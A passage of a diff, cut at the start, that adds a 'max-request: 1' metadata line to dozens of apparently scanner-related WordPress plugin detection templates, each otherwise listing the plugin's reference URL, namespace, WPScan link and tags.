   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
